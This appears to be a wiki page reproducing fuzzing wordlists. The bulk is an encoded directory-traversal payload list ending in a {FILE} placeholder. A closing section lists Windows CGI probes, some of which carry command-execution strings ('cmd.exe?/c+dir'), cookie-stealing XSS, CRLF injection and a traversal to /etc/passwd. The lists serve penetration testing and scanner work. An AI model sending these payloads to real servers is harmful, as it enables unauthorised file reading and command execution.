0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
